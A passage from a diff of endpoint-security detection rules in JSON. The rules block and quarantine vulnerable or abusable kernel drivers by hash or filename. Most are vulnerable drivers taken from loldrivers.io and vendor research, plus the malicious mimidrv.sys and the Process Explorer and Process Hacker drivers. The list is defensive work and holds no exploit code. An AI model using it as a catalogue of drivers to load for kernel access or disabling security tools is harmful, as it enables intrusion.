+ "value": "5c54a5cd3386ac14725a07962562e9fdcefbb7be0d19803f9d71de24573de1e3",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7328f342-5d06-5eaf-b068-ce74ec11b350",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604986Z",
+ "creation_date": "2026-03-23T11:45:29.604988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48e385449293884fd8b960a5aafd638fd67b86a4e344ab8aa8b330c333e2f6de",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7331b3ad-2d92-52a9-b0de-2923f9512335",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466777Z",
+ "creation_date": "2026-03-23T11:45:30.466780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41ad660820c41fc8b1860b13dc1fea8bc8cb2faceb36ed3e29d40d28079d2b1f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "733d2009-8fc2-5f88-9a2c-6a9bcadd11aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146923Z",
+ "creation_date": "2026-03-23T11:45:32.146927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2ff9ef50ae037bb003d7157ea8da008a48f715a78c644b5f027b070bf5eb049",
+ "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/ca6455d1-b06e-496c-be33-f89c41b27540/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73484597-63ac-5e39-8904-5c2d5ce45e55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493347Z",
+ "creation_date": "2026-03-23T11:45:31.493349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfcc07c38577184a196241d9ec950a897283e9035f5691fd98ef0b8a4217fc95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73493972-6467-5cd4-9ac3-b97ab76eb082",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606121Z",
+ "creation_date": "2026-03-23T11:45:29.606123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bfc0f425de9f4e7480aa2d1f2e08892d0553ed0df1c31e9bf3d8d702f38fa2e",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "734d7179-7067-54c2-b2f0-c9dd85c4cc10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156483Z",
+ "creation_date": "2026-03-23T11:45:31.156485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a54fd22d8f78a8ba931972bf703eda24671c6d892c1fb979c8902ee27202a120",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "734e34d7-746e-5d75-9128-8cf79408d400",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486230Z",
+ "creation_date": "2026-03-23T11:45:31.486234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54c6aaa465b70002a698d098850be2dc8fc24cc91dc8c60fc93f809b1ff34e8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7360fccd-6978-5146-8d22-e6350ddc6209",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453313Z",
+ "creation_date": "2026-03-23T11:45:30.453316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453325Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3140005ce5cac03985f71c29732859c88017df9d41c3761aa7c57bbcb7ad2928",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73720332-876e-5d5a-9788-80e5c2797fb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490506Z",
+ "creation_date": "2026-03-23T11:45:31.490508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d5b5e581f7148fabe40f58754b08c9ecf1d0a7d463243c97ec69dea86bf29a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73743ef2-68f4-5751-8099-b0043b53bd69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980498Z",
+ "creation_date": "2026-03-23T11:45:29.980500Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30d737a6da29ad2fe035c0a5f1f7a423a8cd96b8f3dc9885fe95ef3333478dd7",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "737af276-81ed-5d37-aa7a-aa470290a730",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498550Z",
+ "creation_date": "2026-03-23T11:45:31.498553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498561Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89ef99feca2c7e781e1a8986cb8367c4a46a90f9a4640e7b29756ff05851ec43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73820eaf-499d-5319-b3d7-63f67d6d2ac6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606647Z",
+ "creation_date": "2026-03-23T11:45:29.606651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c70f2a3b20ba75fd8d14daab331dfbf341c455cd6bcc1969092ec4559261bcf",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73883859-5576-5d8b-b231-250f9a6cf956",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977090Z",
+ "creation_date": "2026-03-23T11:45:29.977092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9532a354c24fd256c24534c554bca5a126414eb496dbd3223fe9486418df2ea",
+ "comment": "HP Hardware Diagnostic's EtdSupp vulnerable driver (aka etdsupp.sys) [https://github.com/alfarom256/HPHardwareDiagnostics-PoC] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "738a5fe3-89b7-5799-8e30-217cc112b6cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613807Z",
+ "creation_date": "2026-03-23T11:45:29.613808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "410f02303292798ab2a8b3e7d253938b466e83071b15e7d3aaa25f4995b27187",
+ "comment": "Vulnerable Kernel Driver (aka Bs_Def.sys) [https://www.loldrivers.io/drivers/3ac0eda2-a844-4a9d-9cfa-c25a9e05d678/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "739178d9-a60a-5511-aa1d-d4a0f1820332",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819343Z",
+ "creation_date": "2026-03-23T11:45:30.819344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c92df36fa57fd215aef78a016c6cf6bd535bb3472ce4eb07e403535daa96318c",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73a0b036-fede-5775-900e-de25ef5ab872",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829182Z",
+ "creation_date": "2026-03-23T11:45:31.829186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7dc7e4e72bcaa9e7b67f440a2d69b6656b9092ca1a2897fe14905826695432ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73a40aff-4771-5836-9e72-abb7a343aa27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976119Z",
+ "creation_date": "2026-03-23T11:45:29.976121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "systeminformer.sys",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ad278c-5ee5-5ad1-a7bd-76016804d5d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622191Z",
+ "creation_date": "2026-03-23T11:45:29.622193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73bc7830-8325-5279-b26e-6103889f1b9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983351Z",
+ "creation_date": "2026-03-23T11:45:29.983353Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4335f4189240a3bcafa05fab01f0707cc8e3dd7a2998af734c24916d9e37ca8",
+ "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73bf3515-24d6-536b-94c9-c8f90fede636",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817160Z",
+ "creation_date": "2026-03-23T11:45:30.817162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c11dec1571253594d64619d8efc8c0212897be84a75a8646c578e665f58bf5d",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73ca0d88-49b7-5b9b-a3b4-bd8d6309c0b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478600Z",
+ "creation_date": "2026-03-23T11:45:30.478603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5d0849fc567c169176c2002dd358240d75ca0aacfca92c79d252006c6e0444e",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73cf54bb-309c-5fdc-96b7-a0ff25497176",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456219Z",
+ "creation_date": "2026-03-23T11:45:30.456222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a1feb8649a5c0679e1073e6d8a02c8a6ebc5825f02999f16c9459284f1b198b",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "73d6b906-a4c7-5d45-bb89-2f8aa6478a14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
